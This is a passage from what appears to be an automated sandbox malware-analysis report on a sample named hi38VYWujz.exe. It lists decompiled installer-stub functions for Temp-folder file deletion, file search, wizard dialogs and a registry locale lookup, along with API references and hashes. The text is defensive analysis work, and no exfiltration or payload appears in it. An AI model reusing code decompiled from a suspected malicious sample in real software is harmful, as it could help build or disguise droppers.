							_t38 = E004065A2(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B30(_t68);
							_t38 = E00405925(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052C3(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052C3(0xfffffff1, _t68);
							return E00406025(_t67, _t68, 0);
						}
						L30:
						 *0x7a8ac8 =  *0x7a8ac8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405977
0x0040597c
0x00405985
0x00405988
0x00405990
0x00405993
0x00405996
0x0040599e
0x004059a0
0x004059a1
0x00000000
0x004059a1
0x004059ac
0x004059af
0x004059af
0x004059af
0x004059b3
0x004059c6
0x004059cd
0x004059d2
0x004059d6
0x004059e6
0x004059d8
0x004059de
0x004059de
0x004059eb
0x004059ef
0x004059fb
0x00405a01
0x00405a06
0x00405a0c
0x00405a17
0x00405a1d
0x00405a1f
0x00405a22
0x00405acc
0x00405acc
0x00405ad0
0x00405ad2
0x00405ad2
0x00405ad2
0x00405ad2
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a28
0x00405a28
0x00405a28
0x00405a30
0x00405a50
0x00405a58
0x00405a5d
0x00405a64
0x00405a7f
0x00405a84
0x00405a86
0x00405aaa
0x00405a88
0x00405a88
0x00405a8b
0x00405a9f
0x00405a8d
0x00405a90
0x00405a98
0x00405a98
0x00405a8b
0x00405a66
0x00405a6c
0x00405a6e
0x00405a74
0x00405a74
0x00405a6e
0x00000000
0x00405a64
0x00405a32
0x00405a3a
0x00000000
0x00000000
0x00405a3c
0x00405a44
0x00000000
0x00000000
0x00405a46
0x00405a4e
0x00000000
0x00000000
0x00000000
0x00405aaf
0x00405ab7
0x00405abd
0x00405abd
0x00405ac6
0x00000000
0x00405ac6
0x004059f1
0x004059f9
0x00000000
0x00000000
0x00000000
0x004059b5
0x004059b5
0x004059b7
0x00405ad7
0x00405ad9
0x00405adc
0x00405b2d
0x00405b2d
0x00405b2d
0x00405ade
0x00405ae1
0x00405aec
0x00405af1
0x00405af3
0x00000000
0x00000000
0x00405af6
0x00405b02
0x00405b07
0x00405b09
0x00000000
0x00405b24
0x00405b0b
0x00405b0e
0x00000000
0x00000000
0x00405b13
0x00000000
0x00405b1a
0x00405ae3
0x00405ae3
0x00000000
0x00405ae3
0x004059bd
0x004059c0
0x00000000
0x00000000
0x00000000
0x004059c0

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405996
lstrcatW.KERNEL32(007A3F28,\*.*), ref: 004059DE
lstrcatW.KERNEL32(?,0040A014), ref: 00405A01
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405A07
FindFirstFileW.KERNELBASE(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405A17
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB7
FindClose.KERNEL32(00000000), ref: 00405AC6

Strings

"C:\Users\user\Desktop\hi38VYWujz.exe", xrefs: 0040596D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
\*.*, xrefs: 004059D8
(?z, xrefs: 004059C6

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\hi38VYWujz.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2473250573
Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065A2(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4f70); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4f70;
			}

0x004065ad
0x004065b6
0x00000000
0x004065c3
0x004065b9
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,Scienza\Pulmobranchiate.Rid207,00405C81,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,00000000,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,?,?,75ED3420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75ED3420), ref: 004065AD
FindClose.KERNEL32(00000000), ref: 004065B9

Strings

pOz, xrefs: 004065A3
Scienza\Pulmobranchiate.Rid207, xrefs: 004065A2

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: Scienza\Pulmobranchiate.Rid207$pOz
API String ID: 2295610775-1459949
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
Instruction ID: 8bed64cdced8f5e888a37b1465862a95800e92f45c41cc099ab710eb89ed01f5
Opcode Fuzzy Hash: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
Instruction Fuzzy Hash: ABE09272E082008FD7549BA5AA4946D77B0EB84354720803FE112F11C1DA7848418F59

Uniqueness

Uniqueness Score: -1.00%

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403D1B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x7a1f08 = _t37;
					if(_t118 == 0x110) {
						 *0x7a8a28 = _t128;
						 *0x7a1f1c = GetDlgItem(_t128, "true");
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79fee8 = _t94;
						E004041F4(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x7a7a08);
						 *0x7a79ec = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x7a1f08 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x7a8a60;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404240(0x40b);
						while(1) {
							_t39 =  *0x7a1f08;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x7a8a64;
							if(_t41 ==  *0x7a8a64) {
								E0040140B("true");
							}
							__eflags =  *0x7a79ec - _t136;
							if( *0x7a79ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x7a8a64; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406281(_t119, _t128, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041F4(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041F4(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041F4(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x7a8acc - _t136;
							_v32 = _t51;
							if( *0x7a8acc != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404216(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x79fee8, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push("true");
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, "true");
							__eflags =  *0x7a8acc - _t136;
							if( *0x7a8acc == _t136) {
								_push( *0x7a1f1c);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x79fee8);
							}
							E00404229();
							E0040625F(0x7a1f20, E00403CFC());
							E00406281(0x7a1f20, _t128, _t133,  &(0x7a1f20[lstrlenW(0x7a1f20)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x7a1f20); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a79f8); // executed
									 *0x7a0ef8 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x7a8a20,  *_t133 +  *0x7a7a00 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x7a79f8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041F4(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x7a79f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a79ec - _t136;
									if( *0x7a79ec != _t136) {
										goto L61;
									}
									ShowWindow( *0x7a79f8, 8);
									E00404240(0x405);
									goto L58;
								}
								__eflags =  *0x7a8acc - _t136;
								if( *0x7a8acc != _t136) {
									goto L61;
								}
								__eflags =  *0x7a8ac0 - _t136;
								if( *0x7a8ac0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a79f8);
						 *0x7a8a28 = _t136;
						EndDialog(_t128,  *0x7a06f0);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x7a79f8, 0x40f, 0, "true");
						__eflags =  *0x7a79ec;
						return 0 |  *0x7a79ec == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x7a1f00, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f00,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E0040425B(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x7a79f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a8acc - _t136;
										if( *0x7a8acc == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x7a06f0 = 1;
											L21:
											_push(0x78);
											L22:
											E004041CD();
											goto L26;
										}
										E0040140B(_t130);
										 *0x7a06f0 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x7a79f8);
						 *0x7a79f8 = _a12;
						L58:
						if( *0x7a3f20 == _t136 &&  *0x7a79f8 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x7a3f20 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d24
0x00403d2d
0x00403e6e
0x00403e72
0x00403e76
0x00403e78
0x00403e7d
0x00403e88
0x00403e93
0x00403e98
0x00403e9a
0x00403e9c
0x00403e9f
0x00403ea4
0x00403eb2
0x00403ebf
0x00403ec6
0x00403ec6
0x00403ec7
0x00403ec7
0x00403ecc
0x00403ed2
0x00403ed9
0x00403edf
0x00403ee1
0x00403f21
0x00403f26
0x00403f2b
0x00403f2b
0x00403f30
0x00403f39
0x00403f3b
0x00403f40
0x00403f46
0x00403f4a
0x00403f4a
0x00403f4f
0x00403f55
0x00000000
0x00000000
0x00403f60
0x00403f66
0x00000000
0x00000000
0x00403f6f
0x00403f77
0x00403f7c
0x00403f7f
0x00403f85
0x00403f8a
0x00403f8d
0x00403f93
0x00403f98
0x00403f9b
0x00403fa1
0x00403fa9
0x00403faf
0x00403fb5
0x00403fb9
0x00403fc0
0x00403fc0
0x00403fc0
0x00403fca
0x00403fdc
0x00403fe8
0x00403fed
0x00403ff7
0x00403ffd
0x00403fff
0x00404004
0x00404001
0x00404001
0x00404001
0x00404014
0x0040402c
0x0040402e
0x00404034
0x00404049
0x00404036
0x0040403f
0x00404041
0x00404041
0x0040404f
0x00404060
0x00404076
0x0040407d
0x00404083
0x00404087
0x0040408c
0x0040408e
0x00000000
0x00404094
0x00404094
0x00404096
0x00000000
0x00000000
0x0040409c
0x004040a0
0x004040c5
0x004040cb
0x004040d1
0x004040d3
0x00000000
0x00000000
0x004040f9
0x004040ff
0x00404101
0x00404106
0x00000000
0x00000000
0x0040410c
0x0040410f
0x00404112
0x00404129
0x00404135
0x0040414e
0x00404154
0x00404158
0x0040415d
0x00404163
0x00000000
0x00000000
0x0040416d
0x00404178
0x00000000
0x00404178
0x004040a2
0x004040a8
0x00000000
0x00000000
0x004040ae
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040ba
0x0040408e
0x00404185
0x00404191
0x00404198
0x00000000
0x00403ee3
0x00403ee3
0x00403ee6
0x00403f19
0x00403f19
0x00403f1b
0x00000000
0x00000000
0x00000000
0x00403f1b
0x00403ee8
0x00403eec
0x00403ef1
0x00403ef3
0x00000000
0x00000000
0x00403f03
0x00403f0b
0x00000000
0x00403f11
0x00403d3f
0x00403d3f
0x00403d43
0x00403d48
0x00403d57
0x00403d57
0x00403d60
0x00403d69
0x00403d74
0x00403d74
0x00403d80
0x00403d9c
0x00403d9f
0x00403db2
0x00403db8
0x00403e5b
0x00000000
0x00403e64
0x00403dbe
0x00403dcb
0x00403dcd
0x00403dcf
0x00403dee
0x00403dee
0x00403df1
0x00403df6
0x00403df9
0x00403e09
0x00403e0a
0x00403e0c
0x00403e42
0x00403e55
0x00000000
0x00403e55
0x00403e0e
0x00403e14
0x00403e2d
0x00403e32
0x00403e34
0x00000000
0x00000000
0x00403e36
0x00403e22
0x00403e22
0x00403e24
0x00403e24
0x00000000
0x00403e24
0x00403e17
0x00403e1c
0x00000000
0x00403e1c
0x00403dfb
0x00403e01
0x00000000
0x00000000
0x00403e03
0x00000000
0x00403e03
0x00403df3
0x00000000
0x00403df3
0x00403dd9
0x00403de0
0x00403de6
0x00403de8
0x00000000
0x00000000
0x00000000
0x00403de8
0x00403da4
0x00000000
0x00403d82
0x00403d88
0x00403d92
0x0040419e
0x004041a4
0x004041b1
0x004041b7
0x004041b7
0x004041c1
0x00000000
0x004041c1
0x00403d80

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
ShowWindow.USER32(?), ref: 00403D74
DestroyWindow.USER32 ref: 00403D88
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
GetDlgItem.USER32(?,?), ref: 00403DC5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
IsWindowEnabled.USER32(00000000), ref: 00403DE0
GetDlgItem.USER32(?,?), ref: 00403E8E
GetDlgItem.USER32(?,00000002), ref: 00403E98
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F03
GetDlgItem.USER32(?,00000003), ref: 00403FA9
ShowWindow.USER32(00000000,?), ref: 00403FCA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
EnableWindow.USER32(?,?), ref: 00403FF7
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040400D
EnableMenuItem.USER32(00000000), ref: 00404014
SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040402C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
ShowWindow.USER32(?,0000000A), ref: 004041B1

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
Opcode Fuzzy Hash: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040396D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a34;
				_t22 = E00406639(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f20;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040612D(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f20, 0);
					__eflags =  *0x7a1f20;
					if(__eflags == 0) {
						E0040612D(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x7a1f20, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004061A6(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C43(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra";
				 *0x7a8ac0 =  *0x7a8a3c & 0x00000020;
				 *0x7a8adc = 0x10000;
				if(E00405C38(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra") != 0) {
					L16:
					if(E00405C38(_t98, _t86) == 0) {
						E00406281(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8a20, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x7a7a08 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C43(_t78, __eflags);
							__eflags =  *0x7a8ae0;
							if( *0x7a8ae0 != 0) {
								_t33 = E00405396(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x7a79ec;
								if( *0x7a79ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f00, 5); // executed
							_t39 = E004065C9("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065C9("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a79c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a79c0);
								 *0x7a79e4 = _t87;
								RegisterClassW(0x7a79c0);
							}
							_t44 = DialogBoxParamW( *0x7a8a20,  *0x7a7a00 + 0x00000069 & 0x0000ffff, 0, E00403D1B, 0); // executed
							E004038BD(E0040140B(5), "true");
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a20;
						 *0x7a79c4 = E00401000;
						 *0x7a79d0 =  *0x7a8a20;
						 *0x7a79d4 = _t30;
						 *0x7a79e4 = 0x40a380;
						if(RegisterClassW(0x7a79c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
